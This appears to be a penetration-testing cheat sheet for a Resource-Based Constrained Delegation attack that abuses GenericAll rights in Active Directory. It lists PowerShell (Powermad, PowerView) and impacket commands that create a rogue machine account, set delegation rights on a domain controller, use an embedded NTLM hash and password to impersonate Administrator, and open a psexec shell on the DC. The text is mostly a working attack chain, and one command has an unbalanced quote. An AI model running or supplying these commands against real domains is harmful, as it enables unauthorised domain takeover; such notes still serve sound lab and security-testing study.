Generic ALL

Resource-Based Constrained Delegation

Windows

Import-Module .\Powermad.ps1
Import-Module .\PowerView.ps1


New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)


Get-DomainComputer $resourcedc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Linux

impacket-addcomputer resourced.local/l.livingstone -dc-ip $ip -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'attackersystem -computer-pass 'Summer2018!'



sudo python3 ../rbcd.py -dc-ip $ip -t RESOURCEDC -f 'ATTACK' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone


impacket-getST -spn cifs/resourcedc.resourced.local resourced/attackersystem\$:'Summer2018!' -impersonate Administrator -dc-ip $ip


export KRB5CCNAME=Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache


sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip $ip